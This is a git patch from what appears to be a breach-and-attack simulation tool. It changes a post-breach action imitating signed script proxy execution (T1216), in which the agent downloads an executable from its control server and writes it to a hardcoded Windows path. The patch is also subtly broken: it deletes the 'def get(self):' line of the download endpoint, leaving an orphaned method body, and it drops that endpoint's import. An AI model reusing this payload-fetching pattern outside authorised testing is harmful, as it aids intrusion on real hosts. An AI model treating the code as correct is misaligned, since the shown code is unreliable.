From 79eeaa790459ff448700d442996c269ab2c57c7b Mon Sep 17 00:00:00 2001 From: Shreya Date: Tue, 18 Aug 2020 00:22:46 +0530 Subject: [PATCH] Code review changes - smaller executable file; fetches it from the island when pba needs to run - technique configured off by default - other implementation changes --- .../signed_script_proxy/windows/signed_script_proxy.py | 2 ++ monkey/monkey_island/cc/app.py | 1 - monkey/monkey_island/cc/resources/T1216_pba_file_download.py | 1 - 3 files changed, 2 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py index d4a29e844..aad179640 100644 --- a/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py +++ b/monkey/infection_monkey/post_breach/signed_script_proxy/windows/signed_script_proxy.py @@ -1,3 +1,4 @@ +import shutil import subprocess from pathlib import Path @@ -7,6 +8,7 @@ from infection_monkey.control import ControlClient def get_windows_commands_to_proxy_execution_using_signed_script(): # temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe'] # temp_comspec = Path(*temp_comspec_path) + temp_comspec = "c:\\Users\\win\\desktop\\t1216.exe" with ControlClient.get_T1216_pba_file() as r: with open(temp_comspec, 'wb') as f: shutil.copyfileobj(r.raw, f) diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 666431798..31b534b3a 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -31,7 +31,6 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.node_states import NodeStates from monkey_island.cc.resources.pba_file_download import PBAFileDownload -from monkey_island.cc.resources.T1216_pba_file_download import T1216PBAFileDownload from monkey_island.cc.resources.pba_file_upload import FileUpload from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report diff --git a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py index 11f4dd6a8..16aa43581 100644 --- a/monkey/monkey_island/cc/resources/T1216_pba_file_download.py +++ b/monkey/monkey_island/cc/resources/T1216_pba_file_download.py @@ -8,7 +8,6 @@ class T1216PBAFileDownload(flask_restful.Resource): """ File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA) """ - def get(self): executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe'] executable_file = Path(*executable_file_path)